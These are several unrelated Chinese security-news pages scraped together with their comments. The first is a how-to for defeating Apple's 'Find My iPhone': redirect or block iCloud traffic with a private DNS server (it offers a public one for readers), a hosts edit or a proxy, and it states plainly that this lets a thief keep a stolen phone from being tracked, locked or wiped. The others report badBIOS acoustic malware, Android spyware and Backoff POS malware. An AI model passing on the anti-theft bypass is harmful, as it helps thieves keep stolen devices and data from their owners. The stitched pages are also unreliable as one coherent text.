iPhone自带的“寻找我的iPhone”功能一直以来都是小偷们需要解决的问题之一。这个功能就像守护者一样,当你遗失手机时帮助你定位,而实际上小偷总能找到办法绕过这个“守护者”。

几个月之前,有个bug可以被用来关闭“寻找我的iPhone”功能,不需要什么验证,苹果在随后几个版本的更新中修复了这个漏洞。而本文所要介绍的是如何关闭所有版本的iPhone中的“寻找我的iPhone”功能,包括以后的版本。

工作原理
首先FreeBuf有必要解释一下“寻找我的iPhone”的工作原理
丢失手机的用户登录iCloud账户,将手机设置为遗失状态。随后这个手机一旦连接上互联网就会同步iCloud,随后就会被锁定,甚至将手机内所有数据清除,还原到初始状态。

更多详情参见苹果官网

12941089_10205780131448005_785738561_o.jpg

下图显示的就是iPhone用户通过“寻找我的iPhone”跟踪定位手机的情况。

12959362_10205780131608009_1279472146_o.jpg
绕过方法
以下就是使你的苹果设备无法跟踪的办法:

1) 建立私人DNS服务器
这是最简单的办法,百分之百可用。简单来说就是建立一个自己的DNS服务器,然后把所有iCloud的流量重定向到本机或者别的什么地方,使得*icloud.com无法连接。服务器的IP地址可以指向iPhone或者网关。

如果像这样建立了DNS服务器,小偷就可以尽情使用iPhone,不用怕手机被锁或者资料被清空或者被远程跟踪。

对于越狱的手机,甚至可以不用私人DNS服务器,我们可以直接修改hosts文件来屏蔽iCloud。使用移动数据网络的情况下,可以配置VPN使用私有DNS而非默认DNS。

12922402_10205780131568008_1874103608_o-1024×375.jpg

iCloud与丢失手机之间的通信方式

12921946_10205780131528007_922110772_o-1024×347.jpg

我建了一个私有DNS服务器供演示。服务器位于176.123.29.190,它会将*iCloud.com的流量重定向到本地IP。你可以试着把DNS的IP设置到你的iPhone、iPad或者你的路由,然后再试试跟踪你的手机。肯定追踪不了了。但是你可以正常上网浏览其它内容。

77-1024×560.jpg

DNS-changing-on-router-other.jpg

演示

这个漏洞很难修补,即使苹果也很难修补。硬编码的IP也不会有用,我们可以在网关把这个IP拉黑从而绕过。如果你发现有办法修补的话,欢迎在twitter(@N_Cnew)上跟我讲。

2) 建立代理,将iCloud流量drop掉,这样你的手机就在iCloud上离线了
我用BurpSuite截获iCloud流量,不过你先得安装CA证书才能够截获HTTPS流量。

我尝试把我的iPhone置于丢失模式,设置了新密码和警告信息和手机号,如图所示。iCloud会在同步我的手机时发送这些信息,在iCloud发送这些信息的时候实际上我可以截获到。

更糟糕的是,很多人其他设备的pin码都是一样的,如果设置的新密码跟其他设备一样,风险会更大。并且小偷可以通过截取流量了解到更多信息。

6.jpg

保护措施
密码锁和指纹锁
密码锁和指纹锁都是苹果所做的保护措施,但是有些情况下我们能够获取到别人的指纹,Jan Krissler就曾用总理的一张照片获得了他的指纹。(相关报道)另外,根据他的研究,很多人会用常用密码。而市面上也有用来猜解iPhone密码的IPBox。

IOS-8-Adapter-for-IP-Box-300×300.jpg

学会正确使用iCloud
1) iCloud的邮箱在iPhone 或 iPad的邮箱功能中有配置。手机丢的时候人们有时候不会去改邮箱密码,这样的话,小偷就可以利用邮件重置iCloud密码。

2) 很多人没有设置iPhone的密码,设置密码的人中很多人使用了常用密码(如0852,12345,147258,2580等).

3) 很多人没有打开“寻找我的iPhone”功能。原作者询问了他的朋友为什么不开,对方回答说这会消耗移动数据流量,他无语了

如果跟iCloud关联的email被加入到手机的邮箱功能中,如果小偷能够进入邮箱,他们就可以申请对iCloud进行密码重置,然后进入iCloud账号,随后他们就可以关闭“寻找我的iPhone”功能,甚至把你其他的苹果设备都锁定。

*参考来源:kcnabin,FB小编Sphinx编译,文章有修改,转载请注明来自Freebuf黑客与极客(FreeBuf.COM)

更多精彩# iphone# 寻找我的iPhone
Sphinx
Sphinx
410 篇文章
等级: 9级
||
相关推荐

使用lodine建立DNS隧道

国内iCloud服务器遭遇中间人攻击,中国苹果用户隐私不保

保护你的隐私:10项你必须知道的iPhone/iPad iOS 8安全设置

帮女神修手机的意外发现:隐匿在iOS文件系统中的隐私信息

走近科学:硬件“解锁神器”IP BOX如何爆破iPhone锁屏密码

iOS隐私安全之通过popup向用户索取Apple ID和密码

手机丢了以后,都会发生些什么?

留个心眼:用Find My iPhone锁定手机后别太心急,小心反被钓鱼欺诈

这些评论亮了

河蟹回复
本来就是一个用来安慰用户的鸡肋功能
)9(亮了

Q回复
首先你得解锁手机的屏幕锁,更改手机的dns服务器.若是中间人的话你得安装上证书.
)7(亮了

死宅10086(7级)回复
抢沙发抢沙发
)6(亮了

尹立武回复
转发微博
)6(亮了

海淀四哥回复
如果人家在你能够修改之前锁定了设备,你还在么操作设备的网络呢?
)6(亮了
发表评论已有 23 条评论

死宅10086 (7级) 2016-06-01回复1楼
抢沙发抢沙发

亮了(6)

河蟹 2016-06-01回复2楼
本来就是一个用来安慰用户的鸡肋功能

亮了(9)

尹立武 2016-06-01回复3楼
转发微博

亮了(6)

嘹亮的小小小小小小号 2016-06-01回复4楼
卧槽[笑cry][笑cry][笑cry][笑cry]

亮了(5)

海淀四哥 2016-06-01回复5楼
如果人家在你能够修改之前锁定了设备,你还在么操作设备的网络呢?

亮了(6)

霾都P民 2016-06-01回复6楼
私有DNS,成本意外低啊

亮了(2)

Q 2016-06-01回复7楼
首先你得解锁手机的屏幕锁,更改手机的dns服务器.若是中间人的话你得安装上证书.

亮了(7)

TyanBoot 2016-06-01回复
@ Q 完全可以从网关方面拦截包,基本路由器都有这功能。不过屏幕锁倒是解不开

亮了(6)

zw 2016-06-01回复8楼
【评论中包含不友善的言论,已被多人举报】

亮了(5)

时光荏苒_smile 2016-06-01回复9楼
DNS可做的事远远不止这些……

亮了(5)

不玩微博的土冬瓜 2016-06-01回复10楼
买了几斤哈哈

亮了(5)

AI龙纹身的女孩 2016-06-01回复11楼
灰灰不来一张写实?

亮了(5)

哇哇咖咯 2016-06-01回复12楼
首先你得有个苹果啊

亮了(5)

追梦人456 (3级)努力去做自己该做的事情 2016-06-01回复13楼
寻找我的iPhone真的是很鸡肋没有什么用

亮了(5)

星夜江滨 (1级) 2016-06-01回复14楼
是不是先来个解锁的,搞个流程下来。

亮了(5)

1441916133 (3级) 2016-06-01回复15楼
这功能……原来身边的人有人丢过苹果手机,但是,也没见找得到啊。这功能确实无奈。对了,用树莓派还可以模拟GPS信号,这下开心了吧?!

亮了(3)

0neday_wb 2016-06-01回复16楼
脑残小编,你总不能时时刻刻抱着你的si人dns吧

亮了(4)

dsb2468 (2级)你居然会看这里,呵呵 2016-06-02回复17楼
难道只有我在想。。一个丢失了的手机,在有屏幕锁的情况下,你如何让他连上你的所谓的“网”呢?连不上你的“网”,你上面所说的一切都是白搭。。。

亮了(3)

ysc3839 2016-06-02回复18楼
这么搞的话推送服务那些都废了,而且有密码的情况也不能用

亮了(3)

包包 (1级) 2016-06-03回复19楼
是这样不?http://m.baidu.com/from=844b/bd_page_type=1/ssid=0/uid=0/pu=usm%400%2Csz%401320_2001%2Cta%40iphone_1_7.0_3_537/baiduid=4114A6039C1110FB169F0C3587B22A41/w=0_10_iPhone%E8%A2%AB%E5%81%B7%2C%E5%BE%92%E6%89%8B%E5%8D%B3%E5%8F%AF%E7%A0%B4%E8%A7%A3%E5%AF%86%E7%A0%81%2C%E6%97%A0%E9%9C%80%E5%80%9F%E5%8A%A9%E4%BB%BB%E4%BD%95%E6%9C%BA%E5%99%A8%21/t=iphone/l=3/tc?ref=www_iphone&lid=8702559059852530485&order=7&vit=osres&tj=www_normal_7_0_10_title&m=8&srd=1&cltj=cloud_title&dict=30&nt=wnor&sec=1786&di=9e22a485b5933c7c&bdenc=1&nsrc=IlPT2AEptyoA_yixCFOxXnANedT62v3IHwKNKiBVLCqtn6ioxP4kHREsRD8qR7jTUS4quG3RcgoDlnKb0mEm7gV2mq-osm9f7H8hdPjthxW2EtVJut9s

亮了(2)

包包 (1级) 2016-06-03回复
@ 包包 2015年的老套路,有啥好拿出来的。。。

亮了(1)

策天使 (1级) 2016-10-23回复
@ 包包 那个貌似只支持ios9或者不能打电话吧?

亮了(0)

策天使 (1级) 2016-10-23回复20楼
@ 河蟹 借楼———楼主,可以直接屏蔽iCould不?一定要重新定向吗?这样的话苹果可以加密验证信息,强制要求用户连上防盗服务器的云端

亮了(0)
昵称
请输入昵称
必须您当前尚未登录。登录?注册邮箱
请输入邮箱地址
必须(保密)表情插图
有人回复时邮件通知我
Sphinx
Sphinx专栏作者

这家伙太懒了,什么都没写

410
文章数
96
评论数
2
关注者

关注
最近文章
BUF 早餐铺 | Facebook再曝数据丑闻:1.2亿用户数据面临泄露风险;自2012年以来,所有Android设备都受到RAMpage漏洞的影响;Gentoo GitHub镜像被黑客攻击
2018.07.02

BUF 早餐铺 | WebAssembly的修改会使得Meltdown和Spectre补丁失效;英国税务局记录了510万英国人的声音;苹果回应iPhone密码被暴力破解:测试是错误的
2018.06.26

快讯 | 黑龙江高考查分官网瘫痪,查询入口被微信封锁
2018.06.25

浏览更多
文章目录

工作原理
绕过方法
1) 建立私人DNS服务器
演示
2) 建立代理,将iCloud流量drop掉,这样你的手机就在iCloud上离线了
保护措施
密码锁和指纹锁
学会正确使用iCloud
相关阅读
得到相机授权的iPhone APP可在你不知情的情况下偷偷拍照窃取隐私利用私有DNS,“查找我的 iPhone”可被轻松绕过法官要求苹果公司协助FBI解锁手机,库克表示会上诉!Face ID是否使iPhone X更安全?答案可能取决于你自己苹果一招封杀多数iPhone解锁神器,美国警方无奈
推荐关注

官方公众号

聚焦企业安全

官方QQ群 FreeBuf官方微博
文章目录

工作原理
绕过方法
1) 建立私人DNS服务器
演示
2) 建立代理,将iCloud流量drop掉,这样你的手机就在iCloud上离线了
保护措施
密码锁和指纹锁
学会正确使用iCloud
活动预告
3月

纯实战化攻防教学 | 玩转黑客操作系统Blackarch
已结束
3月

合规、技术、实践,从隐私保护走向数据安全
已结束
3月

冠军选手帮你把CTF知识点各个击破
已结束
3月

CTF之web安全入门
已结束

本站由阿里云 提供计算与安全服务

官方QQ群:590717869

用户服务有奖投稿申请专栏提交漏洞参与众测商城企业服务甲方会员厂商会员企业空间企业SRC漏洞众测智能安全合作信息寻求报道广告投放联系我们友情链接关于我们关于我们加入我们
微信公众号
新浪微博赞助商
FreeBuf+小程序
扫码把安全装进口袋

斗象科技FreeBuf漏洞盒子斗象智能安全平台免责条款协议条款Copyright ? 2020 WWW.FREEBUF.COM All Rights Reserved 沪公网安备 31011502009321号
css.php正在加载中…0daybank

最新电脑病毒

FB招聘站
分类阅读
专栏
公开课
企业服务
用户服务
手机版
搜索
投稿
登录
注册
最新研究:电脑病毒或可通过声音进行传播watcher2016-05-09金币奖励+6共385738人围观 ,发现 23 个不明物体系统安全资讯
computer-virus-removal1-702×336.jpg

安全研究者发现电脑病毒”badBiOS”可以通过麦克风音频流进行传播。

其实这些年来,已经有关于病毒使用音频流进行传播的消息,但是并没有研究成果来证明它的存在。如今,德国弗朗霍夫生产技术研究所提交了一概念证明,揭露了一个名为”badBIOS”的病毒是如何通过麦克风进行传播的。

这项研究表示,通过声音来传播电脑病毒是可能的。这也证实了之前有争议的猜想。然而令人震惊的是,该恶意软件变异成了奇怪的,意想不到的新形式。

三年前,Dragos Ruiu,一位电脑安全专家,发现他的一些电脑感染了某种类型的病毒,而且更奇怪的是,它们之间进行着通信,即使关闭了它们的WIFI和蓝牙连接。断开了以太网电缆也无济于事。最后他移除了机器上的无线网卡,也没能阻止病毒的活动。

Ruiu对此无法找到一个合理的解释,所以继续对其进行研究和分析,在十月份,他提交了自己的假设。

这个恶意软件首先通过U盘进入一台电脑,然后再渗透入这台机器的BIOS中。接着,它会接管电脑的麦克风和扬声器,通过高频声音与其它计算机中的病毒进行通讯,而人类并不能察觉到这些高频声音。

他发现“badBIOS”恶意程序的确可以互相之间进行交流。但当时一些较大的安全研究社区并没有认同Ruid的假设,他们认为Ruid犯了基础性的错误。

不过如今,德国弗朗霍夫生产技术研究所的研究员已经提供了一些概念证明,证明Ruiu的假设可能是正确的。通过使用一个在水下用声音传播信息的程序,他们设法让计算机在65英尺远的距离下进行了互相间广播。

重要的是,这不仅仅是两个计算机在交流,而且还演示了如何使用空气介质来进行隐蔽声学通讯,并且可以扩展为多跳网络通讯甚至无线网状网络。这也解释了为何Ruiu不能够完全地清除实验室中受感染机器中的病毒。当他对一台机器的病毒进行清除之后,转向去清除另一台机器,但是这时候,其它未被清除病毒的机器又会对这台机器重新感染。

这种通讯方法的带宽十分小,每秒只有几比特,这使得它无法在目标机器传输大文件。但是它可以作为一个键盘记录工具,记录用户名和密码。这些信息可以让传统的病毒能够进入这台机器,完成后续的工作。

尽管这一研究解释了病毒是如何传播的,但是并没有确定第一台机器是如何被感染的。因为之前没有类似的感染案例,所以如何解决这一疑问对于研究人员们来说仍是一个巨大的挑战。

不过这些已经证明病毒,木马和恶意软件是可能通过音响系统和麦克风传播的。

* 原文链接:techworm,watcher编译,转载请注明来自FreeBuf黑客与极客(FreeBuf.COM)

更多精彩# 病毒
watcher
watcher
26 篇文章
等级: 5级
||
相关推荐

Mac平台新型蠕虫病毒曝光

利用空调系统对隔离网络中的电脑发送指令

诡异事件:神秘跨平台病毒badBIOS

美国部署最复杂的间谍程序:德国总理被窃听

木马的自我修炼:金融恶意程序f0xy最新变种很机智

一种强大的新型BIOS Bootkit病毒曝光

运行于显卡(GPU)的Rootkit木马和键盘记录器问世

扬声器和麦克风通信?神秘病毒badBIOS引发质疑

这些评论亮了

asdfasd回复
以我高大上的理解,我还是不能理解,在清除另一台计算机的病毒时,之前的计算机是如何被重新感染的?没说明关键
)7(亮了
发表评论已有 23 条评论

asdfasd 2016-05-09回复1楼
以我高大上的理解,我还是不能理解,在清除另一台计算机的病毒时,之前的计算机是如何被重新感染的?没说明关键

亮了(7)

watcher (5级)从前我是瞎的,如今我看得见 2016-05-09回复
@ asdfasd 本文是译文,原文中没有说明是如何感染的,我个人认为可能是,一台计算机的病毒被清除之后,可能还会有额外的通讯功能存在,通过与其它计算机的交流,来重构自己。

原文中也说了,还不清楚第一台计算机是如何被感染的

亮了(3)

与非 2016-05-10回复
@ asdfasd 以我的理解, 清除的只是硬盘中的病毒,而BIOS中的病毒依然存在(主要用来通讯),所以会反复感染。

亮了(2)

虾扯蛋 2016-05-09回复2楼
全篇绝口不提接受的问题,电脑没有麦克风,传播个屁

亮了(1)

watcher (5级)从前我是瞎的,如今我看得见 2016-05-09回复
@ 虾扯蛋 按照原文的观点,只要能传播声音就可以把

亮了(0)

Rc4x (3级) 2016-05-09回复3楼
一台没有感染的病毒的电脑,仅凭扬声器或者麦克风接收到高频振动,怎么感染病毒。。。。。难道是高频振动产生的微弱电流通过某种方式,,,可是。。。 ?

亮了(2)

watcher (5级)从前我是瞎的,如今我看得见 2016-05-09回复
@ Rc4x 原文中说了,还不清楚第一台计算机是如何被感染的

亮了(0)

腾讯手机管家 2016-05-09回复4楼
这牛逼吹得真够大的,就算是高端监听音响,他的发生范围也最多20KHz,更别说什么破音响

亮了(3)

MhTEN 2016-05-10回复
@ 腾讯手机管家 20hz以下有某些人体器官共振的频率,搞不好成了次声波武器了,而且要取得好的效果扬声器的尺寸也要增大很多,所以厂商能做到也不会去做

亮了(0)

腾讯手机管家 2016-05-09回复5楼
要说能做到 B&W 钻石高音单元,和 JBL 铍膜高音单元确实能做到,但这些都是天价的东西,20万的音响谁会用电脑上。

亮了(2)

腾讯手机管家 2016-05-09回复6楼
其次把,不说声卡的频响范围,就算有一个很好的解码器可以解码20KHz以上,关键是bios下能直接驱动这些设备?

亮了(2)

夜尽天明 (6级)千秋邈矣独留我,百战归来再读书 2016-05-09回复7楼
怎么把声音频率转化成可执行程序或者脚本?

亮了(2)

cwg2552298 (6级)Follow my own course 2016-05-09回复8楼
这么神奇

亮了(0)

MhTEN 2016-05-10回复9楼
大家似乎都忘了主板上的自检喇叭了,开机时候“滴”的一声,有个API是Beep(frequency,time),你用这个试试,没有音箱也会响的(当然极个别组装机喇叭在机箱上没连上或者主板阉割掉了没办法)

亮了(2)

MhTEN 2016-05-10回复10楼
不必一定要用分辨率非常高的方式,原文也说了传输速率很小,那比如说1000hz当10000hz当1然后模拟现有的传输协议自己写一个二进制传输,500-5000的都视为1000hz分辨率就足够使用了,至于麦克风这个,除了电脑上自己有说不定极端情况下接收端直接处理机箱喇叭的接口电流信号来转换为响应信息,麦克风喇叭的基本原理是相似的,只是喇叭的分辨率不高反馈电流小

亮了(3)

与非 2016-05-10回复
@ MhTEN

确实是如此,麦克风的原理跟喇叭相似,理论上喇叭是可以代替麦克风的部分工作的,再加上大部分电脑都没有内置麦克风,病毒想要传播似乎就只有这一条路可以走。

亮了(0)

MhTEN 2016-05-10回复11楼
上面那句是那比如说1000hz当0,10000hz当1,不允许编辑了

亮了(0)

MhTEN 2016-05-10回复12楼
原文不完整,我找到了51的报道,http://netsecurity.51cto.com/art/201312/420697.htm,文中提到该安全专家的笔记本电脑感染了该病毒,笔记本自带麦克风,这样就可以解释了

亮了(1)

watcher (5级)从前我是瞎的,如今我看得见 2016-05-10回复
@ MhTEN 谢谢啊,本文译文,原文中就没说清楚这一点,谢谢你提供的额外资料

亮了(0)

map 2016-05-10回复13楼
我个人理解,声音只是每台机器中病毒彼此间通讯的手段,这种通讯方法不需要网络的支持,更有隐蔽性。感染可能还是利用传统的方法进行的。

亮了(1)

MhTEN 2016-05-10回复
@ map 严重支持

亮了(0)

susftp (5级)中 2016-05-13回复14楼
wife的接班人!

亮了(1)

呵呵 2017-10-16回复15楼
我把音箱和话筒关掉砸掉电脑就可以了

亮了(1)
昵称
请输入昵称
必须您当前尚未登录。登录?注册邮箱
请输入邮箱地址
必须(保密)表情插图
有人回复时邮件通知我
watcher
watcher

从前我是瞎的,如今我看得见

26
文章数
30
评论数
1
关注者

关注
最近文章
韩国挫败了朝鲜黑客大规模网络攻击
2016.06.26

自动驾驶汽车要火了,安全威胁谁来负责?
2016.06.14

韩国空军官方网站遭到网络攻击,是朝鲜搞的鬼?
2016.05.29

浏览更多
相关阅读
具备多病毒功能!MiraiXMiner物联网僵尸网络攻击来袭老裁缝、独狼病毒家族再度活跃,唯心木马很违心“中国”制造:悍马(Hummer)病毒家族技术分析报告ATBroker.exe:一个被病毒利用的微软进程Linux系统ETN挖矿病毒实例分析
推荐关注

官方公众号

聚焦企业安全

官方QQ群 FreeBuf官方微博
文章目录

活动预告
3月

纯实战化攻防教学 | 玩转黑客操作系统Blackarch
已结束
3月

合规、技术、实践,从隐私保护走向数据安全
已结束
3月

冠军选手帮你把CTF知识点各个击破
已结束
3月

CTF之web安全入门
已结束

本站由阿里云 提供计算与安全服务

官方QQ群:590717869

用户服务有奖投稿申请专栏提交漏洞参与众测商城企业服务甲方会员厂商会员企业空间企业SRC漏洞众测智能安全合作信息寻求报道广告投放联系我们友情链接关于我们关于我们加入我们
微信公众号
新浪微博赞助商
FreeBuf+小程序
扫码把安全装进口袋

斗象科技FreeBuf漏洞盒子斗象智能安全平台免责条款协议条款Copyright ? 2020 WWW.FREEBUF.COM All Rights Reserved 沪公网安备 31011502009321号
css.php正在加载中…0daybank

黑客远程控制别人手机

FB招聘站
分类阅读
专栏
公开课
企业服务
用户服务
手机版
搜索
投稿
登录
注册
揭秘:独特的技术手段,远程控制你的手机Gandalf2014-07-13共408931人围观 ,发现 7 个不明物体终端安全
我们最近在分析恶意样本时候发现了两类独特的技术手段,一种利用轻量级web服务器jetty来窃取用户隐私,另一种使用Androidpn推送指令来远程控制。

一、更独特隐蔽的隐私窃取—web服务器
这类木马利用轻量级web服务器jetty将目标手机变成服务器后,通过url请求获取手机上的任意资源,造成用户隐私泄露。

工作方式:

在目标手机上设置jetty服务器后,通过浏览器等请求特定的URL,可获取目标手机上的资源,包括隐私信息等。

架构如下:

获取用户隐私信息对应的url路径:

007

该木马通过将目标手机变成服务器后,通过url请求获取手机上的任意资源,造成用户隐私泄露,这种方式更为独特而隐蔽。

二、另类指令获取—Androidpn推送
AVL移动团队近期发现了一种使用Androidpn推送指令的远控间谍软件,该程序伪装成系统应用、诱导用户激活设备管理器,根据推送获取的指令来进行上传通话记录、通话录音、环境录音、联系人、短信箱、地理位置等隐私信息,并能执行修改短信箱内容、私发短信、拦截短信、屏蔽来电等操作,窃取用户隐私、影响手机的正常体验。

android push notification原理(源自Androidpn界面截图):

向用户手机客户端push消息(源自Androidpn界面截图):

登录xmpp服务器,获取消息指令(源自Androidpn界面截图):

远控模块流程:

008.PNG

006

此外,该应用能接收指令,私自修改替换短信箱中的内容。。

该样本使用少见的Androidpn推送方式来获取指令,加上多种窃取隐私信息,尤其修改短信箱内容功能更为罕见。

三、小结
随着时间的推移,恶意代码也会使用到各种新的技术和手段,逐步强大而隐蔽,更与安全软件对抗起来。手机设备性能的提升,使得种种PC上的服务变得可能,Android系统功能的增多也给恶意软件带来更多的途径。

[via Gandalf,post by 南山 saya]

更多精彩# android远控# 手机远控# 手机远程控制
Gandalf
Gandalf
3 篇文章
等级: 2级
||
相关推荐

Android平台战场:2019年上半年安全事件总结分析

银行提款机惊现病毒:绕过杀毒软件达到牟利目的

Android平台战场:2019年上半年安全事件总结分析

2017年Android“间谍软件”年度总结报告

“僵尸之手”:一种伪装成正常应用的恶意病毒

安天移动安全联合猎豹移动首次揭露“Operation Manul”疑似在Android端的间谍软件行为

2014年移动恶意色情应用研究报告

恶意软件伪装“正规军”,撕开Booster Cleaner“画皮”下的真相

这些评论亮了

yyyy3333回复
幸好不用安卓。。。 你以为我用的是苹果吗?
诺基亚 1010 还是彩屏的哦
)36(亮了

MeirLin(5级)研表究明,汉字的序顺并不定一能影阅响读,比如当你看完这句话后…回复
我有特别的监控技巧 ?
)11(亮了

z7y回复
@yyyy3333 我不会告诉你110在出厂的时候就被我加上硬控了
)7(亮了
发表评论已有 7 条评论

MeirLin (5级)研表究明,汉字的序顺并不定一能影阅响读,比如当你看完这句话后… 2014-07-13回复1楼
我有特别的监控技巧 ?

亮了(11)

水鳖 2014-07-14回复
@MeirLin 物理监控对吧

亮了(3)

yyyy3333 2014-07-13回复2楼
幸好不用安卓。。。 你以为我用的是苹果吗?

诺基亚 1010 还是彩屏的哦

亮了(36)

z7y 2014-07-14回复
@yyyy3333 我不会告诉你110在出厂的时候就被我加上硬控了

亮了(7)

河蟹 2014-07-14回复3楼
你不会不知道*#06#吧 小子

亮了(2)

这ID是我的马甲 2014-07-14回复
我只是拿你当测试的 别激动

—–==+>| 来自FreeBuf IOS客户端1.0

亮了(3)

qianjinpianfang.com 2014-07-20回复4楼
用webos的路过

亮了(2)
昵称
请输入昵称
必须您当前尚未登录。登录?注册邮箱
请输入邮箱地址
必须(保密)表情插图
有人回复时邮件通知我
Gandalf
Gandalf

test

3
文章数
3
评论数
0
关注者

关注
最近文章
揭秘:短信拦截木马背后的黑色产业
2014.10.11

揭秘:独特的技术手段,远程控制你的手机
2014.07.13

移动APP背后的秘密:间谍APP大阅兵
2014.06.18

浏览更多
文章目录

一、更独特隐蔽的隐私窃取—web服务器
二、另类指令获取—Androidpn推送
三、小结
相关阅读
Xbash勒索挖矿样本分析针对Android沙盒的“中间APP攻击”域安全篇:寻找SYSVOL里的密码和攻击GPP(组策略偏好)升级版TrickBot将支持获取信用卡储蓄卡数据的功能安天AVL联合小米MIUI,首擒顽固病毒“不死鸟”
推荐关注

官方公众号

聚焦企业安全

官方QQ群 FreeBuf官方微博
文章目录

一、更独特隐蔽的隐私窃取—web服务器
二、另类指令获取—Androidpn推送
三、小结
活动预告
3月

纯实战化攻防教学 | 玩转黑客操作系统Blackarch
已结束
3月

合规、技术、实践,从隐私保护走向数据安全
已结束
3月

冠军选手帮你把CTF知识点各个击破
已结束
3月

CTF之web安全入门
已结束

本站由阿里云 提供计算与安全服务

官方QQ群:590717869

用户服务有奖投稿申请专栏提交漏洞参与众测商城企业服务甲方会员厂商会员企业空间企业SRC漏洞众测智能安全合作信息寻求报道广告投放联系我们友情链接关于我们关于我们加入我们
微信公众号
新浪微博赞助商
FreeBuf+小程序
扫码把安全装进口袋

斗象科技FreeBuf漏洞盒子斗象智能安全平台免责条款协议条款Copyright ? 2020 WWW.FREEBUF.COM All Rights Reserved 沪公网安备 31011502009321号
css.php正在加载中…0daybank

backoff

FB招聘站
分类阅读
专栏
公开课
企业服务
用户服务
手机版
搜索
投稿
登录
注册
POS机恶意程序Backoff影响超过1000家美国企业dawner专栏作者2014-09-02金币奖励+5共182015人围观 ,发现 5 个不明物体资讯
据8月22日美国国土安全部和美国特工处发布的消息。名为Backoff的黑客工具仍然极为活跃,在全国各地的POS系统泛滥。这款工具第一次突显恶名,是它在被用以破坏零售巨头为目标的时候。而且在当时反病毒程序并不能检测到它,这极大地激发了安全专家们的兴趣。这款工具到现在仍然没有销声匿迹,然而政府现在正在敦促零售商们检查收银系统。直到星期五为止,国土安全部宣布超过1000家美国企业已经被殃及池鱼。

hacker.jpg

Backoff,黑客!

据纽约时报的博客帖子所述,Backoff黑客行动以黑客们远程点接入扫描企业系统为起始,如那些由第三方供应商和员工远程办公所用手段。一旦一个接入点被确认存在,黑客会使用高速计算机通过数以百万计的密码组合来爆破直至他们登录成功。然后,黑客设法从企业网络渗透到POS系统,从而安装Backoff,把信用卡数据转移到远程服务器上。

最糟糕的时候?除非零售公司去寻找这个工具,不然不会有任何迹象和异常。这意味着客户在他们信用卡信息在黑市出售时,还是完全不知道他们正处于威胁之中。在这种情况下,黑客在有人察觉到发生了什么之前,已经交易了数周时间。然而其他公司如UPS和SuperValu已经表示他们被感染了后,许多潜在的受害企业并没有发表任何声明。

解决这个问题

当技术让他们的陷入泥潭时,企业应该怎样面对?POS机器只是其中一个例子。就像eWEEK最近的一篇文章所指出那样,现在的技术可以重新编译USB的外部设备。这意味着如一个USB存储设备如果可以重新像设计得如同一个键盘,然后一旦连接上就能获取到管理权限。就如Backoff工具那样,想找出设备被篡改的证据是非常困难的。

除了扫描这个恶意软件,零售商们能够做点什么来保护他们的POS网络呢?Gartner研究所的Avivah Litan举了个改进“卡”技术的例子。

“弱点在磁条上,”她说。“我可以在eBay上买一个条纹码阅读器,然后就能很容易从你的信用卡里读取数据。”

确保卡内数据安全的最简单的法子就是使用一个基于芯片的系统,但尽管2015年10月为最后期限,大多数公司可能会错过那个时间点,因为费用实在是巨大,每个终端需要500到1000美金来升级。

然而,除了锁定卡,美国特工处做出了其他建议。零售商应该把公司网络和收银机网络隔离开来,为每个使用者提供双重认证,在用户尝试失败的次数达到一定量后进行锁定。

重要信息披露

然而,事件的真实所在远比他们所看到的要多。根据IBM X-Force威胁情报季度报告,2014年3季度,漏洞披露在这一年急剧下降。在2013年,1602个供应商报告过漏洞。而2014年,威胁的数量减少近半降到926个。尽管大型软件供应商披露的信息的数量保持一致,这一趋势还是值得我们注意的。或许确实存在少许漏洞,有公司只是简单地瞒下,没有报出来呢?

这个问题的部分原因,也可能是浮于表面的必然性攻击。X-Force报告调查过了一些如心脏出血漏洞1day攻击的时间表为,在4月7日CVE-2014-0160的安全咨询发布不到一天就被发现,然后作为一个概念证明开始流传开来。加拿大税务署等机构和安全公司Mandiant在4月9日才开始修补系统,然而这已经太迟了。从本质来讲,这可以看做是一个黑客和安全专家们争分夺秒的比赛,究竟谁能获得最后胜利呢?

流血的心脏

心脏出血漏洞的爆发展现了如何让1day只作破坏之用。如果仅仅如此的话,就跟0day差不多了。黑客们没有浪费时间,加紧尝试更多心脏出血目标,漏洞发布几天后心脏出血漏洞就出补丁了,4月15日攻击频率达到了巅峰。那天攻击次数超过30万,也就是说平均发起了每秒3.47次攻击。

何处是底线?Backoff黑客软件仍然是零售商的头疼之源,在最初被开发出来之后,它在很长一段时间后才被人发现。对于这种或者是类似的威胁,需要我们打破思维惯性做出有效的检测工具,然后创建一个清晰,流程化的披露方案。

[参考信息来源securityintelligence.com,译/FreeBuf实习小编dawner]

更多精彩# Backoff黑客工具
dawner
dawner
289 篇文章
等级: 9级
||
相关推荐

价值2000美金的新型POS机恶意软件 – LusyPOS

新型恶意软件Punkey现已加入POS机木马“豪华午餐”

明日边缘:愈演愈烈的POS机网络犯罪

全球上百家银行和金融机构感染了一种“无文件”恶意程序,几乎无法检测

恶意程序Dexter升级版vSkimmer横空出世

SUCEFUL:将ATM变得“惟命是从”的新型恶意程序

关于ATM渗透与欺诈的知识点Part 1

五大ATM安全漏洞

发表评论已有 5 条评论

Xgrick 2014-09-02回复1楼
硬件过剩时代处处暴破 设备级防护和生物识别跟不上……

亮了(0)

Xgrick 2014-09-02回复2楼
专业“协处理”硬件公司会是爆点吧……

亮了(0)

珂珂 2014-09-03回复3楼
美国特工处是啥机构

亮了(0)

dawner 专栏作者(9级)黎明已经过去,黑暗就在眼前! 2014-09-03回复
@珂珂 国土安全部的下属机构啊~

亮了(0)

diamond (1级) 2014-09-07回复4楼
这个可以有!

亮了(0)
昵称
请输入昵称
必须您当前尚未登录。登录?注册邮箱
请输入邮箱地址
必须(保密)表情插图
有人回复时邮件通知我
dawner
dawner专栏作者

黎明已经过去,黑暗就在眼前!

289
文章数
421
评论数
3
关注者

关注
最近文章
celery超时机制小结
2019.10.14

浅谈Git监控平台
2019.07.30

浅谈安全运维优化
2019.07.19

浏览更多
相关阅读
Buf早餐铺 | 广州GOMO开发的GO输入法收集用户隐私信息;美国证券交易委员会发现黑客疑似窃取财务资料非法牟利;入侵电源管理可以黑掉芯片攻击者利用7号信令(SS7)中的漏洞从德国银行偷取钱财Skimmer中的巨无霸:ATM整机伪造BUF早餐铺 | 央视批App Store审核不严,系统存漏洞;Dixons Carphone数据泄露影响一千多万用户;SamSam获取赎金约600万美元安全研究人员发现可以利用推特控制僵尸网络(附工具下载)
推荐关注

官方公众号

聚焦企业安全

官方QQ群 FreeBuf官方微博
文章目录

活动预告
3月

纯实战化攻防教学 | 玩转黑客操作系统Blackarch
已结束
